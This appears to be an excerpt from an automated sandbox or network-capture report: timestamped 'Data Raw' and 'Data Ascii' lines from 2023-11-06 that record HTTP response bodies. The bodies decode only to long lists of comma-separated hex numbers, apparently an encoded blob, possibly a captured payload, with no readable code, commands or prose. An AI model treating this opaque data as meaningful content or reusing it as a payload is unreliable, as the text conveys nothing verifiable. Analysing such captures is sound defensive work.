31 30 30 2c 31 30 34 2c 61 32 2c 31 33 61 2c 62 30 2c 63 61 2c 31 36 31 2c 64 34 2c 61 65 2c 65 61 2c 64 65 2c 61 34 2c 62 31 2c 61 32 2c 31 35 64 2c
                                                                                                                                                                      Data Ascii: 5b,c3,b8,120,102,a5,6d,ae,b6,a1,80,c7,ce,12b,ab,58,e2,d3,109,81,10a,126,137,38,87,14f,68,e4,42,c3,6e,121,c2,75,7d,cb,132,75,8b,11e,162,d2,11c,149,a7,134,8e,e8,8d,ed,a0,bd,147,be,93,102,93,e6,d0,111,4f,10c,100,104,a2,13a,b0,ca,161,d4,ae,ea,de,a4,b1,a2,15d,
                                                                                                                                                                      2023-11-06 14:35:15 UTC168INData Raw: 2c 66 65 2c 37 38 2c 39 64 2c 31 32 63 2c 31 30 61 2c 31 35 34 2c 31 31 65 2c 35 34 2c 35 64 2c 31 35 63 2c 66 34 2c 61 61 2c 63 62 2c 38 62 2c 66 66 2c 66 61 2c 39 61 2c 65 65 2c 37 35 2c 31 31 37 2c 62 37 2c 36 37 2c 62 30 2c 64 32 2c 66 37 2c 31 32 38 2c 31 30 64 2c 61 31 2c 31 31 31 2c 64 64 2c 37 30 2c 31 30 62 2c 37 34 2c 64 61 2c 61 66 2c 35 62 2c 31 34 38 2c 63 32 2c 37 38 2c 37 65 2c 61 38 2c 31 30 65 2c 31 32 32 2c 65 65 2c 61 30 2c 37 31 2c 66 31 2c 66 31 2c 61 30 2c 31 31 66 2c 38 30 2c 64 62 2c 38 30 2c 31 33 30 2c 63 62 2c 64 66 2c 61 37 2c 31 35 38 2c 65 62 2c 37 34 2c 63 61 2c 31 32 62 2c 61 66 2c 37 30 2c 31 31 31 2c 39 33 2c 31 34 61 2c 61 64 2c 36 38 2c 38 32 2c 35 64 2c 39 34 2c 61 65 2c 31 35 61 2c 64 38 2c 37 30 2c 37 39 2c 31 30 62
                                                                                                                                                                      Data Ascii: ,fe,78,9d,12c,10a,154,11e,54,5d,15c,f4,aa,cb,8b,ff,fa,9a,ee,75,117,b7,67,b0,d2,f7,128,10d,a1,111,dd,70,10b,74,da,af,5b,148,c2,78,7e,a8,10e,122,ee,a0,71,f1,f1,a0,11f,80,db,80,130,cb,df,a7,158,eb,74,ca,12b,af,70,111,93,14a,ad,68,82,5d,94,ae,15a,d8,70,79,10b
                                                                                                                                                                      2023-11-06 14:35:15 UTC172INData Raw: 30 2c 31 30 35 2c 31 30 37 2c 38 30 2c 36 66 2c 64 30 2c 31 35 35 2c 36 36 2c 31 31 38 2c 31 32 30 2c 31 31 64 2c 66 39 2c 31 34 62 2c 64 39 2c 36 36 2c 61 63 2c 61 63 2c 66 38 2c 37 31 2c 64 30 2c 36 62 2c 65 30 2c 37 31 2c 35 63 2c 31 30 36 2c 31 30 34 2c 31 34 65 2c 38 32 2c 64 39 2c 31 34 31 2c 31 32 64 2c 34 34 2c 31 31 64 2c 63 34 2c 36 39 2c 65 61 2c 38 34 2c 63 64 2c 36 36 2c 65 33 2c 31 33 36 2c 65 32 2c 31 31 65 2c 36 63 2c 31 32 66 2c 36 39 2c 31 30 36 2c 62 64 2c 38 34 2c 66 31 2c 37 39 2c 35 37 2c 38 32 2c 31 30 65 2c 66 65 2c 64 62 2c 31 32 32 2c 31 32 30 2c 31 34 61 2c 31 30 37 2c 39 39 2c 31 37 32 2c 63 63 2c 36 37 2c 66 65 2c 66 34 2c 31 30 39 2c 31 33 64 2c 31 32 63 2c 31 35 62 2c 36 63 2c 65 37 2c 35 64 2c 38 63 2c 66 33 2c 37 34 2c 31
                                                                                                                                                                      Data Ascii: 0,105,107,80,6f,d0,155,66,118,120,11d,f9,14b,d9,66,ac,ac,f8,71,d0,6b,e0,71,5c,106,104,14e,82,d9,141,12d,44,11d,c4,69,ea,84,cd,66,e3,136,e2,11e,6c,12f,69,106,bd,84,f1,79,57,82,10e,fe,db,122,120,14a,107,99,172,cc,67,fe,f4,109,13d,12c,15b,6c,e7,5d,8c,f3,74,1
                                                                                                                                                                      2023-11-06 14:35:15 UTC175INData Raw: 62 2c 31 32 33 2c 31 33 32 2c 31 33 63 2c 31 32 61 2c 39 34 2c 31 35 34 2c 63 65 2c 31 30 62 2c 31 32 39 2c 31 32 61 2c 31 35 64 2c 31 31 34 2c 36 36 2c 39 61 2c 64 66 2c 31 34 32 2c 31 31 32 2c 31 34 33 2c 31 33 34 2c 31 33 66 2c 31 34 62 2c 31 35 38 2c 31 32 38 2c 31 30 39 2c 66 34 2c 31 31 65 2c 31 31 63 2c 65 63 2c 31 31 34 2c 31 35 61 2c 31 33 34 2c 31 32 35 2c 66 38 2c 62 66 2c 62 39 2c 31 35 34 2c 31 34 36 2c 31 34 63 2c 31 32 31 2c 63 61 2c 31 32 39 2c 31 32 61 2c 31 35 37 2c 31 30 63 2c 31 30 36 2c 31 32 32 2c 31 33 66 2c 31 35 37 2c 31 31 33 2c 64 35 2c 31 35 61 2c 63 61 2c 31 31 66 2c 31 35 38 2c 31 35 33 2c 31 32 35 2c 31 31 35 2c 31 32 36 2c 37 39 2c 31 35 36 2c 31 31 65 2c 31 34 30 2c 31 31 64 2c 31 32 35 2c 31 32 33 2c 31 30 37 2c 63 66 2c
                                                                                                                                                                      Data Ascii: b,123,132,13c,12a,94,154,ce,10b,129,12a,15d,114,66,9a,df,142,112,143,134,13f,14b,158,128,109,f4,11e,11c,ec,114,15a,134,125,f8,bf,b9,154,146,14c,121,ca,129,12a,157,10c,106,122,13f,157,113,d5,15a,ca,11f,158,153,125,115,126,79,156,11e,140,11d,125,123,107,cf,
                                                                                                                                                                      2023-11-06 14:35:15 UTC179INData Raw: 31 34 39 2c 31 32 64 2c 31 30 31 2c 31 30 30 2c 31 36 30 2c 31 33 34 2c 31 33 36 2c 66 61 2c 38 66 2c 31 35 63 2c 31 33 64 2c 31 33 64 2c 31 33 34 2c 38 61 2c 31 34 62 2c 31 35 38 2c 31 34 39 2c 31 30 31 2c 64 33 2c 31 36 35 2c 31 34 62 2c 31 35 38 2c 31 31 63 2c 39 64 2c 65 37 2c 62 32 2c 62 39 2c 31 30 37 2c 31 34 32 2c 31 32 63 2c 31 34 32 2c 31 35 36 2c 31 34 39 2c 31 30 63 2c 61 62 2c 63 61 2c 31 36 31 2c 31 33 34 2c 31 33 36 2c 62 33 2c 64 65 2c 31 35 64 2c 31 33 64 2c 31 33 39 2c 31 33 34 2c 62 39 2c 31 34 39 2c 31 35 38 2c 31 34 64 2c 31 32 39 2c 31 30 62 2c 31 31 37 2c 31 34 62 2c 31 35 61 2c 31 31 34 2c 64 31 2c 31 33 32 2c 31 32 35 2c 31 31 64 2c 31 30 61 2c 39 33 2c 31 35 33 2c 31 34 36 2c 31 35 30 2c 64 61 2c 66 39 2c 31 32 37 2c 31 32 61 2c
                                                                                                                                                                      Data Ascii: 149,12d,101,100,160,134,136,fa,8f,15c,13d,13d,134,8a,14b,158,149,101,d3,165,14b,158,11c,9d,e7,b2,b9,107,142,12c,142,156,149,10c,ab,ca,161,134,136,b3,de,15d,13d,139,134,b9,149,158,14d,129,10b,117,14b,15a,114,d1,132,125,11d,10a,93,153,146,150,da,f9,127,12a,
                                                                                                                                                                      2023-11-06 14:35:15 UTC183INData Raw: 64 2c 31 35 62 2c 31 33 61 2c 63 36 2c 31 36 61 2c 31 34 35 2c 31 34 62 2c 31 35 34 2c 31 32 39 2c 31 30 62 2c 31 33 33 2c 65 61 2c 31 35 38 2c 31 35 65 2c 31 33 63 2c 31 36 34 2c 31 30 61 2c 31 30 33 2c 31 32 31 2c 31 32 66 2c 63 35 2c 31 36 31 2c 31 34 36 2c 31 35 36 2c 31 34 35 2c 31 30 64 2c 31 30 62 2c 31 32 38 2c 65 36 2c 31 34 30 2c 31 34 30 2c 31 32 32 2c 31 33 62 2c 31 33 33 2c 31 31 62 2c 31 34 31 2c 31 35 39 2c 63 38 2c 31 35 37 2c 31 35 38 2c 31 35 33 2c 31 32 35 2c 31 30 62 2c 31 34 37 2c 31 34 39 2c 65 33 2c 31 34 37 2c 31 36 38 2c 31 33 34 2c 31 32 31 2c 66 39 2c 31 31 30 2c 31 34 30 2c 31 35 31 2c 63 39 2c 31 36 31 2c 31 34 39 2c 31 33 37 2c 31 32 35 2c 31 30 30 2c 31 34 33 2c 31 33 32 2c 63 35 2c 31 32 63 2c 31 33 66 2c 31 35 64 2c 31 33
                                                                                                                                                                      Data Ascii: d,15b,13a,c6,16a,145,14b,154,129,10b,133,ea,158,15e,13c,164,10a,103,121,12f,c5,161,146,156,145,10d,10b,128,e6,140,140,122,13b,133,11b,141,159,c8,157,158,153,125,10b,147,149,e3,147,168,134,121,f9,110,140,151,c9,161,149,137,125,100,143,132,c5,12c,13f,15d,13
                                                                                                                                                                      2023-11-06 14:35:15 UTC187INData Raw: 39 2c 31 32 62 2c 31 35 36 2c 31 34 61 2c 31 33 36 2c 31 31 37 2c 31 36 36 2c 31 33 34 2c 31 31 62 2c 31 31 34 2c 31 33 31 2c 31 31 61 2c 31 33 30 2c 31 34 34 2c 31 35 36 2c 31 33 66 2c 31 32 38 2c 31 32 37 2c 31 30 32 2c 39 37 2c 31 33 33 2c 31 34 30 2c 31 31 38 2c 65 37 2c 31 34 65 2c 31 33 63 2c 31 31 62 2c 31 33 37 2c 31 34 33 2c 31 34 62 2c 31 34 65 2c 31 34 34 2c 31 32 37 2c 31 30 64 2c 39 61 2c 31 34 61 2c 31 35 65 2c 31 33 32 2c 31 31 30 2c 31 30 63 2c 37 30 2c 31 32 31 2c 31 33 32 2c 31 33 63 2c 31 35 34 2c 31 34 36 2c 31 32 63 2c 62 33 2c 31 33 35 2c 31 31 61 2c 31 32 39 2c 31 33 39 2c 31 30 65 2c 31 33 65 2c 31 32 32 2c 31 33 35 2c 31 34 65 2c 31 33 63 2c 31 31 62 2c 31 33 35 2c 31 34 33 2c 31 34 62 2c 31 34 65 2c 31 34 34 2c 31 32 38 2c 31 30
                                                                                                                                                                      Data Ascii: 9,12b,156,14a,136,117,166,134,11b,114,131,11a,130,144,156,13f,128,127,102,97,133,140,118,e7,14e,13c,11b,137,143,14b,14e,144,127,10d,9a,14a,15e,132,110,10c,70,121,132,13c,154,146,12c,b3,135,11a,129,139,10e,13e,122,135,14e,13c,11b,135,143,14b,14e,144,128,10
                                                                                                                                                                      2023-11-06 14:35:15 UTC191INData Raw: 31 34 34 2c 31 35 33 2c 31 32 31 2c 31 32 38 2c 31 32 39 2c 31 32 61 2c 31 35 37 2c 31 33 34 2c 31 33 65 2c 66 61 2c 66 33 2c 31 35 62 2c 31 33 64 2c 31 33 39 2c 31 33 36 2c 31 34 33 2c 31 32 33 2c 31 31 39 2c 31 35 31 2c 31 32 39 2c 31 32 62 2c 31 36 35 2c 31 32 31 2c 63 30 2c 31 33 63 2c 31 36 36 2c 31 30 63 2c 31 30 62 2c 31 32 33 2c 31 33 32 2c 31 33 38 2c 31 35 34 2c 31 34 34 2c 31 35 34 2c 31 32 31 2c 61 62 2c 31 32 37 2c 31 32 61 2c 31 35 37 2c 63 35 2c 66 32 2c 31 32 30 2c 31 33 66 2c 31 35 33 2c 31 31 64 2c 62 38 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 66 66 2c 31 33 64 2c 62 36 2c 63 36 2c 31 36 34 2c 31 34 62 2c 31 35 34 2c 31 31 34 2c 66 38 2c 31 33 33 2c 31 32 35 2c 31 31 39 2c 31 33 32 2c 31 31 38 2c 31 30 65 2c 31 34 36 2c 31 35 34 2c 31 34
                                                                                                                                                                      Data Ascii: 144,153,121,128,129,12a,157,134,13e,fa,f3,15b,13d,139,136,143,123,119,151,129,12b,165,121,c0,13c,166,10c,10b,123,132,138,154,144,154,121,ab,127,12a,157,c5,f2,120,13f,153,11d,b8,15c,145,14b,ff,13d,b6,c6,164,14b,154,114,f8,133,125,119,132,118,10e,146,154,14
                                                                                                                                                                      2023-11-06 14:35:15 UTC195INData Raw: 62 2c 31 33 37 2c 31 33 31 2c 64 33 2c 35 37 2c 38 65 2c 31 35 39 2c 31 32 33 2c 31 33 36 2c 39 33 2c 63 38 2c 31 35 64 2c 31 33 64 2c 31 34 32 2c 31 33 37 2c 66 61 2c 31 33 61 2c 31 34 64 2c 66 32 2c 64 35 2c 31 32 34 2c 31 35 62 2c 31 33 34 2c 31 30 36 2c 31 32 39 2c 31 35 65 2c 31 32 33 2c 31 31 62 2c 31 30 34 2c 31 32 32 2c 31 31 30 2c 62 31 2c 31 33 35 2c 31 35 32 2c 31 32 61 2c 31 32 37 2c 64 31 2c 31 31 37 2c 31 35 64 2c 31 32 33 2c 31 33 63 2c 62 38 2c 31 33 39 2c 65 66 2c 66 65 2c 61 38 2c 31 35 65 2c 31 34 36 2c 31 34 63 2c 31 34 37 2c 31 34 63 2c 31 30 31 2c 31 33 33 2c 31 36 35 2c 31 34 62 2c 31 35 38 2c 62 63 2c 31 36 37 2c 31 33 34 2c 31 32 35 2c 31 31 66 2c 31 30 37 2c 31 34 32 2c 31 32 61 2c 31 33 33 2c 31 32 36 2c 31 34 33 2c 31 33 37 2c
                                                                                                                                                                      Data Ascii: b,137,131,d3,57,8e,159,123,136,93,c8,15d,13d,142,137,fa,13a,14d,f2,d5,124,15b,134,106,129,15e,123,11b,104,122,110,b1,135,152,12a,127,d1,117,15d,123,13c,b8,139,ef,fe,a8,15e,146,14c,147,14c,101,133,165,14b,158,bc,167,134,125,11f,107,142,12a,133,126,143,137,
                                                                                                                                                                      2023-11-06 14:35:15 UTC199INData Raw: 2c 31 34 62 2c 31 33 36 2c 31 32 34 2c 31 32 31 2c 31 33 66 2c 31 35 64 2c 31 32 32 2c 31 31 62 2c 31 30 39 2c 31 34 35 2c 31 34 62 2c 31 34 65 2c 31 34 61 2c 31 31 33 2c 39 32 2c 31 36 34 2c 31 34 62 2c 31 35 65 2c 31 32 31 2c 31 35 64 2c 66 63 2c 38 30 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 34 65 2c 31 32 66 2c 31 31 36 2c 62 33 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 65 33 2c 31 33 33 2c 31 34 30 2c 31 32 32 2c 31 33 62 2c 31 35 62 2c 61 63 2c 63 35 2c 31 35 62 2c 31 34 35 2c 31 34 62 2c 31 35 34 2c 31 35 31 2c 31 31 32 2c 64 64 2c 64 34 2c 31 32 64 2c 66 63 2c 64 63 2c 65 61 2c 31 33 33 2c 31 32 35 2c 31 32 33 2c 31 32 65 2c 31 34 30 2c 31 33 63 2c 65 65 2c 63 35 2c 31 32 61 2c 31 32 37 2c 63 37 2c 63 61 2c 65 33 2c 31 33 33 2c 31 34 30 2c 31 32 32
                                                                                                                                                                      Data Ascii: ,14b,136,124,121,13f,15d,122,11b,109,145,14b,14e,14a,113,92,164,14b,15e,121,15d,fc,80,123,132,142,14e,12f,116,b3,137,129,12a,e3,133,140,122,13b,15b,ac,c5,15b,145,14b,154,151,112,dd,d4,12d,fc,dc,ea,133,125,123,12e,140,13c,ee,c5,12a,127,c7,ca,e3,133,140,122
                                                                                                                                                                      2023-11-06 14:35:15 UTC203INData Raw: 30 66 2c 66 64 2c 64 62 2c 63 33 2c 31 31 66 2c 31 33 66 2c 31 35 64 2c 31 33 39 2c 31 34 30 2c 65 31 2c 31 33 65 2c 31 34 62 2c 31 35 38 2c 31 34 66 2c 31 30 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 64 2c 31 30 38 2c 31 33 66 2c 31 33 31 2c 31 32 32 2c 61 38 2c 31 32 63 2c 31 34 32 2c 31 35 34 2c 31 34 32 2c 31 33 38 2c 65 37 2c 31 33 34 2c 61 65 2c 31 32 32 2c 31 36 31 2c 31 33 34 2c 31 33 63 2c 62 33 2c 65 38 2c 31 35 64 2c 31 33 64 2c 31 33 39 2c 38 61 2c 65 35 2c 63 65 2c 31 35 32 2c 31 35 33 2c 31 32 39 2c 31 33 31 2c 31 36 32 2c 31 32 36 2c 65 33 2c 31 33 35 2c 31 36 38 2c 31 33 34 2c 31 32 31 2c 31 30 35 2c 64 30 2c 63 35 2c 31 34 64 2c 31 34 36 2c 31 35 36 2c 31 34 35 2c 31 32 30 2c 66 66 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 32 64 2c
                                                                                                                                                                      Data Ascii: 0f,fd,db,c3,11f,13f,15d,139,140,e1,13e,14b,158,14f,109,135,165,14b,15d,108,13f,131,122,a8,12c,142,154,142,138,e7,134,ae,122,161,134,13c,b3,e8,15d,13d,139,8a,e5,ce,152,153,129,131,162,126,e3,135,168,134,121,105,d0,c5,14d,146,156,145,120,ff,12a,161,134,12d,
                                                                                                                                                                      2023-11-06 14:35:15 UTC207INData Raw: 61 37 2c 31 33 35 2c 31 35 64 2c 31 33 64 2c 31 33 66 2c 31 35 34 2c 62 36 2c 31 34 39 2c 31 35 38 2c 31 35 33 2c 31 32 37 2c 31 30 64 2c 31 35 64 2c 31 34 62 2c 31 35 65 2c 31 33 36 2c 31 36 31 2c 31 31 64 2c 63 64 2c 31 31 38 2c 31 32 62 2c 31 34 30 2c 64 39 2c 31 32 63 2c 31 35 36 2c 31 34 39 2c 31 33 33 2c 66 33 2c 35 66 2c 31 35 66 2c 62 39 2c 31 33 35 2c 31 32 32 2c 31 33 66 2c 31 35 39 2c 31 33 37 2c 62 34 2c 31 35 61 2c 31 34 35 2c 31 34 62 2c 31 35 36 2c 31 32 62 2c 31 32 31 2c 31 33 35 2c 31 36 35 2c 31 34 35 2c 31 35 63 2c 63 31 2c 31 35 63 2c 31 33 34 2c 31 32 35 2c 31 31 66 2c 31 32 63 2c 62 33 2c 31 35 32 2c 31 34 36 2c 31 35 36 2c 31 34 37 2c 31 30 66 2c 31 32 31 2c 31 32 61 2c 31 36 31 2c 31 32 65 2c 31 33 65 2c 61 37 2c 31 33 32 2c 31 35
                                                                                                                                                                      Data Ascii: a7,135,15d,13d,13f,154,b6,149,158,153,127,10d,15d,14b,15e,136,161,11d,cd,118,12b,140,d9,12c,156,149,133,f3,5f,15f,b9,135,122,13f,159,137,b4,15a,145,14b,156,12b,121,135,165,145,15c,c1,15c,134,125,11f,12c,b3,152,146,156,147,10f,121,12a,161,12e,13e,a7,132,15
                                                                                                                                                                      2023-11-06 14:35:15 UTC211INData Raw: 2c 31 30 36 2c 31 32 39 2c 31 36 34 2c 31 32 33 2c 31 32 31 2c 31 30 39 2c 31 30 30 2c 35 65 2c 31 35 32 2c 31 33 64 2c 31 32 65 2c 31 33 34 2c 31 33 37 2c 31 32 39 2c 31 32 34 2c 31 35 66 2c 31 32 64 2c 31 33 61 2c 66 61 2c 31 32 39 2c 31 35 64 2c 31 33 64 2c 31 33 64 2c 31 35 61 2c 31 33 64 2c 31 32 33 2c 31 34 31 2c 31 35 33 2c 31 32 39 2c 31 32 66 2c 31 33 62 2c 31 34 62 2c 31 35 65 2c 31 32 39 2c 31 33 38 2c 31 33 31 2c 31 32 35 2c 65 36 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 32 2c 31 35 36 2c 31 34 39 2c 31 32 36 2c 31 32 37 2c 61 66 2c 31 34 31 2c 31 33 34 2c 31 34 30 2c 31 31 65 2c 31 33 35 2c 31 33 32 2c 31 31 35 2c 31 34 31 2c 65 31 2c 31 32 61 2c 31 34 62 2c 31 35 38 2c 31 34 66 2c 31 32 33 2c 31 31 63 2c 66 32 2c 31 34 31 2c 31 35 65 2c
                                                                                                                                                                      Data Ascii: ,106,129,164,123,121,109,100,5e,152,13d,12e,134,137,129,124,15f,12d,13a,fa,129,15d,13d,13d,15a,13d,123,141,153,129,12f,13b,14b,15e,129,138,131,125,e6,132,142,154,142,156,149,126,127,af,141,134,140,11e,135,132,115,141,e1,12a,14b,158,14f,123,11c,f2,141,15e,
                                                                                                                                                                      2023-11-06 14:35:15 UTC227INData Raw: 31 2c 31 34 32 2c 31 35 34 2c 31 30 38 2c 31 35 35 2c 31 34 39 2c 31 33 37 2c 31 32 33 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 33 35 2c 31 32 32 2c 31 33 66 2c 31 35 63 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 34 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 66 35 2c 31 36 34 2c 31 34 62 2c 31 35 65 2c 66 35 2c 31 36 37 2c 31 33 34 2c 31 32 35 2c 31 31 64 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 33 62 2c 31 35 36 2c 31 34 39 2c 31 33 36 2c 31 30 65 2c 66 61 2c 31 35 63 2c 31 33 34 2c 66 35 2c 31 32 31 2c 31 33 66 2c 31 35 64 2c 31 32 63 2c 31 34 33 2c 31 35 63 2c 31 33 34 2c 31 34 62 2c 65 35 2c 63 65 2c 31 32 39 2c 31 33 35 2c 31 35 62 2c 31 34 31 2c 31 35 65 2c 31 33 61 2c 31 34 38 2c 31 32 33 2c 37 65 2c 31 30 64 2c 64 34 2c 31 31 61 2c 31
                                                                                                                                                                      Data Ascii: 1,142,154,108,155,149,137,123,12a,161,134,135,122,13f,15c,13d,143,15c,145,144,158,153,129,f5,164,14b,15e,f5,167,134,125,11d,132,142,154,13b,156,149,136,10e,fa,15c,134,f5,121,13f,15d,12c,143,15c,134,14b,e5,ce,129,135,15b,141,15e,13a,148,123,7e,10d,d4,11a,1
                                                                                                                                                                      2023-11-06 14:35:15 UTC239INData Raw: 62 36 2c 62 33 2c 31 33 31 2c 31 34 32 2c 31 34 65 2c 64 37 2c 63 61 2c 31 34 39 2c 31 33 37 2c 31 31 66 2c 62 62 2c 37 66 2c 31 33 33 2c 31 34 30 2c 31 31 63 2c 31 33 66 2c 31 33 38 2c 31 33 35 2c 31 33 32 2c 31 35 37 2c 31 32 63 2c 64 63 2c 65 38 2c 31 35 32 2c 31 32 39 2c 31 32 66 2c 66 36 2c 36 37 2c 31 35 64 2c 31 33 63 2c 31 36 32 2c 31 33 34 2c 31 31 32 2c 31 31 64 2c 31 33 32 2c 36 34 2c 31 34 66 2c 31 32 30 2c 31 35 36 2c 31 34 39 2c 35 39 2c 31 32 39 2c 31 31 39 2c 31 35 62 2c 31 32 30 2c 31 34 32 2c 31 31 66 2c 31 32 63 2c 31 35 36 2c 31 32 63 2c 31 33 63 2c 31 33 30 2c 31 33 61 2c 31 34 62 2c 31 35 32 2c 31 34 32 2c 31 32 33 2c 63 36 2c 64 32 2c 31 34 62 2c 31 35 65 2c 31 33 32 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 31 32 2c 31 32 64 2c 31
                                                                                                                                                                      Data Ascii: b6,b3,131,142,14e,d7,ca,149,137,11f,bb,7f,133,140,11c,13f,138,135,132,157,12c,dc,e8,152,129,12f,f6,67,15d,13c,162,134,112,11d,132,64,14f,120,156,149,59,129,119,15b,120,142,11f,12c,156,12c,13c,130,13a,14b,152,142,123,c6,d2,14b,15e,132,168,134,125,112,12d,1
                                                                                                                                                                      Data Ascii: ,e3,149,d0,c4,b6,102,f3,dc,be,cd,f8,ca,d0,15c,100,dd,f4,e3,ba,cc,f7,d7,11d,d8,104,c2,c0,b0,bf,142,f3,e2,f2,d7,d2,b6,b7,161,eb,d2,d2,cd,ee,d6,d1,f7,d2,d8,158,100,b0,c2,f1,e6,f1,10e,11a,cf,b1,f5,df,d3,f1,db,f1,d5,c4,129,e9,f5,c8,e9,c1,d3,f1,d8,cf,e9,145,dd,
                                                                                                                                                                      2023-11-06 14:35:16 UTC687INData Raw: 38 35 2c 36 30 2c 64 34 2c 39 63 2c 37 34 2c 63 39 2c 38 61 2c 34 37 2c 61 39 2c 62 35 2c 35 32 2c 62 66 2c 37 37 2c 35 64 2c 64 63 2c 38 65 2c 36 31 2c 64 62 2c 39 37 2c 36 39 2c 64 37 2c 61 39 2c 34 37 2c 62 34 2c 62 39 2c 36 39 2c 64 64 2c 39 30 2c 38 36 2c 62 33 2c 37 37 2c 34 31 2c 62 31 2c 39 36 2c 37 32 2c 63 35 2c 61 37 2c 36 37 2c 62 37 2c 39 65 2c 34 38 2c 65 30 2c 38 39 2c 35 65 2c 61 32 2c 62 33 2c 37 62 2c 62 64 2c 39 37 2c 37 61 2c 63 34 2c 39 64 2c 37 36 2c 64 32 2c 37 66 2c 35 33 2c 65 34 2c 39 65 2c 37 63 2c 62 63 2c 64 62 2c 35 32 2c 61 34 2c 37 39 2c 35 30 2c 63 32 2c 61 37 2c 36 34 2c 64 35 2c 39 66 2c 35 35 2c 61 39 2c 37 64 2c 37 66 2c 62 34 2c 39 36 2c 34 30 2c 62 66 2c 62 31 2c 35 62 2c 63 32 2c 62 32 2c 36 33 2c 63 62 2c 61 62 2c
                                                                                                                                                                      Data Ascii: 85,60,d4,9c,74,c9,8a,47,a9,b5,52,bf,77,5d,dc,8e,61,db,97,69,d7,a9,47,b4,b9,69,dd,90,86,b3,77,41,b1,96,72,c5,a7,67,b7,9e,48,e0,89,5e,a2,b3,7b,bd,97,7a,c4,9d,76,d2,7f,53,e4,9e,7c,bc,db,52,a4,79,50,c2,a7,64,d5,9f,55,a9,7d,7f,b4,96,40,bf,b1,5b,c2,b2,63,cb,ab,
                                                                                                                                                                      2023-11-06 14:35:16 UTC703INData Raw: 2c 37 66 2c 34 38 2c 65 31 2c 61 35 2c 35 65 2c 61 32 2c 39 31 2c 37 62 2c 62 64 2c 62 37 2c 37 61 2c 63 35 2c 39 65 2c 37 36 2c 64 33 2c 37 66 2c 35 33 2c 65 35 2c 62 65 2c 37 63 2c 62 62 2c 62 61 2c 35 32 2c 61 34 2c 37 38 2c 35 30 2c 63 31 2c 61 61 2c 36 34 2c 64 36 2c 62 62 2c 35 35 2c 61 39 2c 39 66 2c 37 66 2c 62 34 2c 39 33 2c 34 30 2c 62 66 2c 61 66 2c 35 62 2c 63 32 2c 61 64 2c 36 33 2c 63 62 2c 63 63 2c 37 31 2c 61 39 2c 38 62 2c 38 33 2c 63 62 2c 64 32 2c 35 61 2c 65 37 2c 38 61 2c 34 33 2c 61 32 2c 38 34 2c 36 30 2c 64 34 2c 62 61 2c 37 34 2c 63 38 2c 38 62 2c 34 37 2c 61 61 2c 62 35 2c 35 32 2c 62 66 2c 37 36 2c 35 64 2c 64 64 2c 38 66 2c 36 31 2c 64 62 2c 39 62 2c 36 39 2c 64 38 2c 63 38 2c 34 37 2c 62 35 2c 62 62 2c 36 39 2c 64 64 2c 38 65
                                                                                                                                                                      Data Ascii: ,7f,48,e1,a5,5e,a2,91,7b,bd,b7,7a,c5,9e,76,d3,7f,53,e5,be,7c,bb,ba,52,a4,78,50,c1,aa,64,d6,bb,55,a9,9f,7f,b4,93,40,bf,af,5b,c2,ad,63,cb,cc,71,a9,8b,83,cb,d2,5a,e7,8a,43,a2,84,60,d4,ba,74,c8,8b,47,aa,b5,52,bf,76,5d,dd,8f,61,db,9b,69,d8,c8,47,b5,bb,69,dd,8e
                                                                                                                                                                      2023-11-06 14:35:16 UTC719INData Raw: 66 2c 62 33 2c 35 62 2c 63 33 2c 62 30 2c 36 33 2c 63 62 2c 63 61 2c 37 31 2c 61 39 2c 38 62 2c 38 33 2c 63 61 2c 62 31 2c 35 61 2c 65 38 2c 38 37 2c 34 33 2c 61 33 2c 38 35 2c 36 30 2c 64 33 2c 39 61 2c 37 34 2c 63 39 2c 38 63 2c 34 37 2c 61 61 2c 62 34 2c 35 32 2c 63 30 2c 39 34 2c 35 64 2c 64 63 2c 39 32 2c 36 31 2c 64 63 2c 62 36 2c 36 39 2c 64 38 2c 61 37 2c 34 37 2c 62 35 2c 64 36 2c 36 39 2c 64 64 2c 39 30 2c 38 36 2c 62 33 2c 37 38 2c 34 31 2c 62 32 2c 62 34 2c 37 32 2c 63 35 2c 61 37 2c 36 37 2c 62 37 2c 37 65 2c 34 38 2c 65 31 2c 38 39 2c 35 65 2c 61 32 2c 62 31 2c 37 62 2c 62 64 2c 62 35 2c 37 61 2c 63 35 2c 62 66 2c 37 36 2c 64 33 2c 39 61 2c 35 33 2c 65 34 2c 39 66 2c 37 63 2c 62 62 2c 62 61 2c 35 32 2c 61 34 2c 37 38 2c 35 30 2c 63 31 2c 61
                                                                                                                                                                      Data Ascii: f,b3,5b,c3,b0,63,cb,ca,71,a9,8b,83,ca,b1,5a,e8,87,43,a3,85,60,d3,9a,74,c9,8c,47,aa,b4,52,c0,94,5d,dc,92,61,dc,b6,69,d8,a7,47,b5,d6,69,dd,90,86,b3,78,41,b2,b4,72,c5,a7,67,b7,7e,48,e1,89,5e,a2,b1,7b,bd,b5,7a,c5,bf,76,d3,9a,53,e4,9f,7c,bb,ba,52,a4,78,50,c1,a
                                                                                                                                                                      2023-11-06 14:35:16 UTC735INData Raw: 35 39 2c 31 33 35 2c 31 32 62 2c 31 35 34 2c 31 33 64 2c 31 33 33 2c 31 35 32 2c 31 35 33 2c 31 32 36 2c 31 32 64 2c 31 34 64 2c 31 34 33 2c 31 35 36 2c 31 33 32 2c 31 36 38 2c 31 32 64 2c 31 32 33 2c 31 30 62 2c 31 31 61 2c 31 33 61 2c 31 34 63 2c 31 33 65 2c 31 34 65 2c 31 34 31 2c 31 32 65 2c 31 32 39 2c 31 32 34 2c 31 35 39 2c 31 31 63 2c 31 33 37 2c 31 31 61 2c 31 33 37 2c 31 34 35 2c 31 32 35 2c 31 33 65 2c 31 35 63 2c 31 34 33 2c 31 34 39 2c 31 34 30 2c 31 34 62 2c 31 32 33 2c 31 33 35 2c 31 36 34 2c 31 33 33 2c 31 34 64 2c 62 63 2c 62 62 2c 31 31 65 2c 62 30 2c 31 32 33 2c 62 61 2c 31 34 32 2c 65 30 2c 31 34 36 2c 65 65 2c 31 34 39 2c 64 32 2c 31 32 39 2c 62 64 2c 31 36 31 2c 63 66 2c 31 34 